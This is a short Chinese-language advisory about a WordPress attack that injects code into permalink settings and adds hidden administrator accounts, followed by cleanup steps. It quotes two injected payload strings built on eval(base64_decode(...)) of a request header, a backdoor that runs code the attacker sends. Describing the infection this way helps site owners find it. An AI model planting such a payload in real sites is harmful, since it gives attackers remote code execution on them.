WordPress SQL注入-最新攻擊


許多站點都受到最近的SQL攻擊的打擊,其中將代碼注入到您的站點。 這種MySQL注入會使其無效,從而影響您的永久鏈接。 因此,您的博客文章網址將不起作用。 這次攻擊針對了許多WordPress博客,這要感謝Andy Soward引起我們的注意。

由於此攻擊,您的永久鏈接結構中添加了以下代碼之一:

%&({$ {eval(base64_decode($ _ SERVER[HTTP_REFERER]))}} | .. +)&%

“ /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

這些引號會附加在您網站上的所有永久鏈接上,並且只有在手動刪除後才能更改。

要解決此問題,請轉到:

設置>永久鏈接,然後刪除上述代碼並替換您的默認代碼。

接下來需要做的是轉到用戶。 您將看到有多個管理員。 您不會看到他們的名字,但是您會看到人數增加。 因此,您需要做的是查看所有用戶,並找到最後一個註冊的用戶。 將鼠標移到該用戶上並獲取鏈接。 通過在該數字上加1來更改代碼userid =。 因此,如果您看到的最後一個用戶是用戶#2,則將其添加1並將其設置為3。您應該發現隱藏的管理員的名字中有一個奇怪的代碼。 刪除代碼並使其成為訂戶。 然後返回並刪除他。

這應該可以解決問題。 您也可以通過直接轉到PHPMyAdmin來刪除他。 因為您將在那裡看到用戶。

我們只是想盡快發布此新聞,以便可以更新用戶。 請確保您檢查自己的博客沒有被感染。 我們希望WordPress很快發布。

另外,如果您尚未實施某些措施來保護WordPress管理區域。